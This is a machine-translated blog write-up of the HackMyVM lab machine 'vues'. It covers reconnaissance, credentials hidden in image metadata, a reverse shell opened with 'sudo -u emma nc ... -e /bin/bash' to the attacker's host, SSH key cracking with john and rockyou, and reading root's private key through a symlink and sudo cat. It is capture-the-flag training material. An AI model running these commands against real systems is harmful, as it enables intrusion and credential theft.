当前位置:网站首页>Hackmyvm Target Series (3) - vues
Hackmyvm Target Series (3) - vues
2022-07-06 13:57:00 【La lune doit savoir ce que je veux dire.】
Un.、Collecte d'informations
Détecter d'abord le segment réseau,Obtenir l'hôte cible
nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox
Ensuite, faites un balayage de port,DécouvertesshServices ethttpServices
nmap -sC -sV -p- 192.168.200.234
VisitehttpServices,Il n'y a qu'une image et un commentaire.
Ce commentaire semble être un indice,alicciaSupposons que ce soit un utilisateur
UtiliserdirsearchNumérisez le catalogue,Voir ce qu'il y a à gagner
dirsearch -u http://192.168.200.234/ -e php,html,txt,bak,zip,7z,gz,db -x 404,301,500,502
Mais il n'y a rien
Selon ses indications, Télécharger l'image , Regardez les métadonnées de l'image
curl http://192.168.200.234/white.png -o white.png
./exiftool white.png
Comme le montre la figure, J'ai trouvé le mot de passe
Utilisation et téléchargement des outils :
ExifToolGuide de démarrage complet
alicia:ihaveadream
2.、Exploitation des vulnérabilités
Connexion réussie
Non trouvé dans le répertoire courant après être entré flag, J'ai lu un catalogue et j'ai trouvé 4Utilisateurs,Et aprèssophiaTrouvé dans le catalogueflag,Mais pas de permission,Ça ne marche pas..
Alors essayez d'en parler d'abord ?
sudo -l
Découvrez que l'utilisateur actuel peut emmaExécution de l'identité de l'utilisateurnc Sans mot de passe .
Dans ce cas,, Alors rebondissez d'abord shellEssaie..
kaliPort d'écoute supérieur
Ensuite, exécutez l'instruction suivante sur la machine cible
sudo -u emma nc 192.168.200.192 10000 -e /bin/bash
Accepté avec succèsshell,Utiliserpython Obtenir une interaction shell
python -c 'import pty; pty.spawn("/bin/bash")'
Trouvé dans le répertoire courantnote.txtDocumentation,Il se lit comme suit:.
Je ne peux m'empêcher de ???Je ne sais pas ce que ça veut dire..
Puis j'ai regardé de nouveau suidEtsudoDroit de rétractation, Il n'y a pas de percée .
J'ai vu le grand wp, Il a été constaté que certains outils de traitement d'images sont nécessaires
Après le téléchargement de l'image, Cliquez sur cette flèche .
Puis vous verrez le nom d'utilisateur et le mot de passe , C'est un vrai trou , Toutes les informations sont cachées dans cette image
sophia:seemstobeimpossible
Connexion réussie
L'utilisateur actuel peut utiliser n'importe quelle identité d'utilisateur catVue des commandes.invisibleDocumentation.Cela signifie que nous utilisonscat La commande peut être utilisée pour afficher le fichier avec rootAutorité.
Ouvre.,C'est l'utilisateur.isabella La clé privée de , Prenez - le et essayez
J'ai dû continuer à taper le mot de passe .
Ça ne peut que commencer à exploser
Peut être utiliséjohn the ripperEffectuer le dynamitage, Mais utilisez d'abord la commande suivante pour id_rsaConvertir enjohnReconnaissablehashValeur
python3 /usr/share/john/ssh2john.py id_rsa > crack.txt
J'utilise des scripts pour faire exploser .
rockyou.txt- Oui.kali Un dictionnaire que j'ai apporté avec moi ,/usr/share/wordlists/rockyou.txt.gz, Il faut le décompresser avant de l'utiliser ,Sinon, il y aura du désordre
gzip -d rockyou.txt.gz
Le mot de passe a explosé avec succès(Le mot de passe est1Plus de 10 000 lignes, Mais ici, à cause de l'écriture wp Je l'ai juste mis devant )
invisible
Comme le montre la figure,Connexion réussie
Commencez par en bas, Parce qu'on a changé de réseau ,Donc çaIPÇa a changé.
Trois、Augmentation des droits
Voyez ici s'il y a des commandes qui peuvent être utilisées pour soulever des droits
Mais il n'y a pas eu de percée
Et soudain, je me suis souvenu d'avant sophiaUtilisation par l'utilisateurcatLa commande lit.invisible Le fichier a rootPermissions, Puis - je utiliser isabellaL'utilisateur.invisibllaLien utilisateur versroot Et la clé privée de l'utilisateur ?
Créer un lien souple
ln -sf /root/.ssh/id_rsa .invisible
LirerootClé privée de l'utilisateur
sudo cat /home/isabella/.invisible
Il y a un petit problème à se connecter avec une clé privée ici , Les permissions trop élevées peuvent entraîner l'échec de la connexion .
Réduire les permissions ,Connectez - vous à nouveau
chmod 600 key
Connexion réussie,ObtenirrootAutorité
边栏推荐
- 7-3 construction hash table (PTA program design)
- 【VMware异常问题】问题分析&解决办法
- (原创)制作一个采用 LCD1602 显示的电子钟,在 LCD 上显示当前的时间。显示格式为“时时:分分:秒秒”。设有 4 个功能键k1~k4,功能如下:(1)k1——进入时间修改。
- 稻 城 亚 丁
- JS several ways to judge whether an object is an array
- C language Getting Started Guide
- 强化学习基础记录
- HackMyvm靶机系列(5)-warez
- This time, thoroughly understand the MySQL index
- [graduation season · advanced technology Er] goodbye, my student days
猜你喜欢
强化学习基础记录
Strengthen basic learning records
这次,彻底搞清楚MySQL索引
MATLAB打开.m文件乱码解决办法
Package bedding of components
Programme de jeu de cartes - confrontation homme - machine
Poker game program - man machine confrontation
Mixlab unbounded community white paper officially released
A comprehensive summary of MySQL transactions and implementation principles, and no longer have to worry about interviews
FAQs and answers to the imitation Niuke technology blog project (I)
随机推荐
[hand tearing code] single case mode and producer / consumer mode
一段用蜂鸣器编的音乐(成都)
(original) make an electronic clock with LCD1602 display to display the current time on the LCD. The display format is "hour: minute: Second: second". There are four function keys K1 ~ K4, and the fun
7-15 h0161. 求最大公约数和最小公倍数(PTA程序设计)
强化学习基础记录
HackMyvm靶机系列(4)-vulny
Nuxtjs快速上手(Nuxt2)
Strengthen basic learning records
Implementation principle of automatic capacity expansion mechanism of ArrayList
Strengthen basic learning records
Differences among fianl, finally, and finalize
Brief introduction to XHR - basic use of XHR
【MySQL数据库的学习】
canvas基础1 - 画直线(通俗易懂)
[graduation season · advanced technology Er] goodbye, my student days
canvas基础2 - arc - 画弧线
Leetcode.3 无重复字符的最长子串——超过100%的解法
Experiment 7 use of common classes
7-7 7003 组合锁(PTA程序设计)
实验七 常用类的使用